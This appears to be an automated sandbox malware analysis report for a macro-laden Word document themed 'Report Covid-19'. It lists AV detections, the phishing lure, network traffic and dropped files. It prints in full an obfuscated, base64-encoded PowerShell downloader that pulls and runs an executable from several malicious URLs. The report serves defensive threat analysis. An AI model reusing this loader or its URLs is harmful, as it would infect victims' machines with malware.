Loading ...

Play interactive tourEdit tour

Analysis Report Report Covid-19.doc

Overview

General Information

Sample Name:Report Covid-19.doc
Analysis ID:294479
MD5:1feae5f3183009794c7287e2788f9dd7
SHA1:bcb1b7b93d568e75eff335cb132a965d30b39ae2
SHA256:0114ef28af9fcadd963f188229d69a89ee149dd188f58b1968c65b699a4e609a

Most interesting Screenshot:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Creates HTML files with .exe extension (expired dropper behavior)
Creates processes via WMI
Encrypted powershell cmdline option found
Very long command line found
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops certificate files (DER)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2276 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • powershell.exe (PID: 1320 cmdline: powershell -en JABFADYAdQBvAHMAeABlAD0AKAAoACcARwBfACcAKwAnAGYAcwAnACkAKwAoACcANgAnACsAJwBiADUAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AdgA6AFUAUwBFAHIAUABSAE8ARgBpAEwARQBcAGMAQgBVAHQATwAyADQAXABvADgAbgAyAFAAMQA3AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQASQByAGUAYwBUAG8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwBgAFUAUgBpAFQAeQBwAGAAUgBvAFQAYABPAGMATwBMACIAIAA9ACAAKAAnAHQAbAAnACsAJwBzACcAKwAoACcAMQAyACwAJwArACcAIAB0ACcAKQArACgAJwBsACcAKwAnAHMAMQAxACcAKQArACgAJwAsACAAdABsACcAKwAnAHMAJwApACkAOwAkAFQAagB6AGMAZgBoADcAIAA9ACAAKAAoACcARwBsADQAJwArACcAeQA5ACcAKwAnAGcAaAAnACkAKwAnAGcAJwApADsAJABBAG8AagBpAHkAcABiAD0AKAAoACcAVAA4ACcAKwAnAGwAJwApACsAKAAnAHgAcgAnACsAJwAzAHIAJwApACkAOwAkAFgAbwBkADkAZwB3AHAAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAaQAxACcAKwAoACcANgAnACsAJwBDAGIAJwApACsAKAAnAHUAdABvACcAKwAnADIAJwApACsAKAAnADQAaQAnACsAJwAxADYATwA4ACcAKwAnAG4AMgBwACcAKQArACgAJwAxACcAKwAnADcAaQAxADYAJwApACkALgAiAHIARQBgAFAATABhAGMARQAiACgAKABbAEMASABBAFIAXQAxADAANQArAFsAQwBIAEEAUgBdADQAOQArAFsAQwBIAEEAUgBdADUANAApACwAJwBcACcAKQApACsAJABUAGoAegBjAGYAaAA3ACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABaAGoAcAB3AGsAaABzAD0AKAAnAFEAJwArACgAJwB0ACcAKwAnAGQAOABoAGEAJwApACsAJwBfACcAKQA7ACQATAA1AHIAcgAzAHYAdQA9AC4AKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAHQALgB3AEUAYgBjAGwASQBFAG4AdAA7ACQARQB5ADQANwAyAHUAZAA9ACgAJwBoACcAKwAnAHQAdAAnACsAJwBwACcAKwAoACcAOgAnACsAJwAvAC8AJwApACsAJwB0AGgAJwArACgAJwBlAGoAbwB5AGYAJwArACcAbABvACcAKQArACcAdwAnACsAJwBlAHIAJwArACgAJwAuAGMAbwBtACcAKwAnAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGEAZABtACcAKQArACcAaQAnACsAKAAnAG4AJwArACcALwBmACcAKQArACcANQAvACcAKwAoACcAKgBoACcAKwAnAHQAdABwACcAKQArACcAcwAnACsAKAAnADoALwAvACcAKwAnAGoAJwApACsAJwBhACcAKwAnAHQAJwArACgAJwBvAGEAcAAnACsAJwBwAC4AYwBvAG0ALwAnACsAJwB3AG8AJwApACsAJwByACcAKwAoACcAZABwAHIAZQBzACcAKwAnAHMAJwApACsAKAAnAC8ASQAvACoAJwArACcAaAAnACsAJwB0AHQAJwArACcAcAA6ACcAKQArACcALwAnACsAKAAnAC8AYQAnACsAJwBtACcAKQArACgAJwBlACcAKwAnAHMAcwAnACkAKwAoACcAYQBnAGUAZgBvAHIAaQAnACsAJwBuACcAKwAnAG4AJwArACcAZQAnACkAKwAnAHIAJwArACgAJwBnAGEAJwArACcAbQAnACkAKwAoACcAZQAuACcAKwAnAGMAbwAnACsAJwBtAC8AbgAnACkAKwAnAGUAdwAnACsAKAAnAHcAbwAnACsAJwByACcAKQArACgAJwBsACcAKwAnAGQALwAnACkAKwAoACcAbwAnACsAJwBYAEoATQAnACsAJwAzAGoAQQAvACoAJwApACsAJwBoACcAKwAnAHQAJwArACgAJwB0AHAAcwA6ACcAKwAnAC8AJwArACcALwAnACkAKwAoACcAYwBhAHIAJwArACcAbwBsACcAKwAnAGkAbgBhAHMAawAnACkAKwAoACcAeQAnACsAJwBsAGkAZwBoACcAKQArACcAdABzACcAKwAnAC4AJwArACgAJwBjACcAKwAnAG8AbQAvACcAKQArACcAdwAnACsAKAAnAHAAJwArACcALQBjAG8AbgB0AGUAbgAnACsAJwB0AC8ANwAnACsAJwAvACoAaAB0ACcAKQArACgAJwB0AHAAcwAnACsAJwA6ACcAKQArACcALwAvACcAKwAnAHIAJwArACgAJwBhAGcAJwArACcAYQAnACkAKwAoACcAbgB0ACcAKwAnAGUAYwBoACcAKwAnAG4AaQBjAGEAbAAnACkAKwAoACcALgAnACsAJwBjAG8AbQAnACkAKwAnAC8AJwArACcAdwAnACsAKAAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlACcAKwAnAHMAJwArACcALwAxAFEAMwAnACkAKwAnAFgAUgAnACsAKAAnAHoAJwArACcAWAAvACcAKQArACcAKgBoACcAKwAoACcAdAAnACsAJwB0ACcAKwAnAHAAOgAvAC8AbgAnACkAKwAnAGUAJwArACgAJwBzACcAKwAnAGMAbwBhACcAKwAnAHQALgBjAG8AbQAnACsAJwAvAHcAcAAtACcAKQArACgAJwBpAG4AJwArACcAYwBsAHUAJwApACsAJwBkAGUAJwArACcAcwAvACcAKwAoACcAawBNAFMAJwArACcAeAA3AEUARQAvACcAKwAnACoAJwArACcAaAB0ACcAKQArACgAJwB0ACcAKwAnAHAAcwA6ACcAKQArACcALwAnACsAKAAnAC8AcwAnACsAJwBlACcAKQArACgAJwBlACcAKwAnAGkAdAAnACkAKwAnAGIAJwArACcAZQAnACsAJwBpAHQAJwArACcAYgB1ACcAKwAoACcAbAAnACsAJwBnAGEAcgBpACcAKQArACcAYQAnACsAKAAnAC4AYwAnACsAJwBvAG0ALwBzACcAKQArACgAJwB5AHMAJwArACcAbABvACcAKQArACcAZwAnACsAKAAnAC8AJwArACcAWgBWAC8AJwApACkALgAiAFMAcABMAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASwA0AHEAagA2AG0AdgA9ACgAJwBDACcAKwAnAGUAZQAnACsAKAAnAGYAJwArACcAcwBkADIAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABYAGQAdgA3ADEAcgB6ACAAaQBuACAAJABFAHkANAA3ADIAdQBkACkAewB0AHIAeQB7ACQATAA1AHIAcgAzAHYAdQAuACIARABPAHcATgBgAGwAYABPAGAAQQBkAGYASQBMAEUAIgAoACQAWABkAHYANwAxAHIAegAsACAAJABYAG8AZAA5AGcAdwBwACkAOwAkAEkAMgAwADgAMwB1AGwAPQAoACgAJwBXACcAKwAnAGYAdwAnACkAKwAnAGYAJwArACgAJwBsAGUAJwArACcAZwAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABYAG8AZAA5AGcAdwBwACkALgAiAGwAZQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMwA0ADIANwA4ACkAIAB7ACYAKAAnAEkAbgAnACsAJwB2AG8AawAnACsAJwBlAC0ASQB0AGUAbQAnACkAKAAkAFgAbwBkADkAZwB3AHAAKQA7ACQAUQBpAHoAbABpAGMAeAA9ACgAKAAnAFcAJwArACcAcwBnAGQAJwApACsAKAAnAG4AdgAnACsAJwB1ACcAKQApADsAYgByAGUAYQBrADsAJABPAHcAcQBjAGQANwA1AD0AKAAoACcAUQBuACcAKwAnADEAJwApACsAJwAyAHEAJwArACcAaQBfACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASwBpADYANgBjAGoAZAA9ACgAKAAnAEkAaQAnACsAJwA4ACcAKQArACgAJwBjAGUAMgAnACsAJwB0ACcAKQApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: Report Covid-19.docAvira: detected
Antivirus detection for URL or domainShow sources
Source: http://amessageforinnergame.com/newworld/oXJM3jA/Avira URL Cloud: Label: malware
Source: http://thejoyflower.com/wp-admin/f5/Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URLShow sources
Source: ragantechnical.comVirustotal: Detection: 8%Perma Link
Source: jatoapp.comVirustotal: Detection: 10%Perma Link
Source: amessageforinnergame.comVirustotal: Detection: 10%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Report Covid-19.docVirustotal: Detection: 69%Perma Link
Source: Report Covid-19.docReversingLabs: Detection: 68%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: global trafficDNS query: name: thejoyflower.com
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.165.88:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.24.108.69:80

Networking:

barindex
Creates HTML files with .exe extension (expired dropper behavior)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: Gl4y9ghg.exe.2.dr
Source: global trafficHTTP traffic detected: GET /wp-admin/f5/ HTTP/1.1Host: thejoyflower.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /newworld/oXJM3jA/ HTTP/1.1Host: amessageforinnergame.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/kMSx7EE/ HTTP/1.1Host: nescoat.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: nescoat.com
Source: Joe Sandbox ViewIP Address: 104.24.108.69 104.24.108.69
Source: Joe Sandbox ViewIP Address: 78.142.208.117 78.142.208.117
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{55454A84-8E09-401E-A760-1A1C7B299BE3}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /wp-admin/f5/ HTTP/1.1Host: thejoyflower.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /newworld/oXJM3jA/ HTTP/1.1Host: amessageforinnergame.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/kMSx7EE/ HTTP/1.1Host: nescoat.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: nescoat.com
Source: unknownDNS traffic detected: queries for: thejoyflower.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8X-UA-Compatible: IE=edgeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://amessageforinnergame.com/wp-json/>; rel="https://api.w.org/"Server: LiteSpeedConnection: Keep-AliveX-LiteSpeed-Cache: hitContent-Length: 72270Date: Wed, 07 Oct 2020 11:51:50 GMT
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Gl4y9ghg.exe.2.drString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: Enable Editing" and then click "Enable Content". m ii: ^ . . . ,J S &1 @ O I @ 100%
Source: Screenshot number: 8Screenshot OCR: Enable Content". m ii: ^ . . . ,J S &1 @ O I @ 100% G) A GE)
Source: Document image extraction number: 0Screenshot OCR: Enable Editing" and then click "Enable Content".
Source: Document image extraction number: 0Screenshot OCR: Enable Content".
Source: Document image extraction number: 1Screenshot OCR: Enable Editing" and then click "Enable Content".
Source: Document image extraction number: 1Screenshot OCR: Enable Content".
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 4528
Source: Report Covid-19.docOLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentationOLE, VBA macro: Module Qs5q3eigprbsz5gx2h, Function Document_openName: Document_open
Source: Report Covid-19.docOLE indicator, VBA macros: true
Source: classification engineClassification label: mal96.evad.winDOC@2/14@7/7
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$port Covid-19.docJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBF87.tmpJump to behavior
Source: Report Covid-19.docOLE indicator, Word Document stream: true
Source: Report Covid-19.docOLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................*...............................*.....................`I.........v.....................K......8.R.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v......x.....0.................R.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#....... . . . .D.i.r.e.c.t.o.r.y.:. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.c.B.U.t.O.2.4.........R.....J.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j...... .............................}..v....0.x.....0.................R.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............k..j.....(=.............................}..v......x.....0.................R.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+..................j......x.............................}..v....P.x.....0.................R.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............;..j....................................}..v......x.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............;..j..... ..............................}..v......x.....0...............8.R.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j....................................}..v....H.x.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j......R.............................}..v......x.....0.................R.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............K..j....................................}..v....(.y.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............K..j..... ..............................}..v......y.....0.................R.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j....`IR.............................}..v.... .......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j....................................}..v....X.......0................FR.............................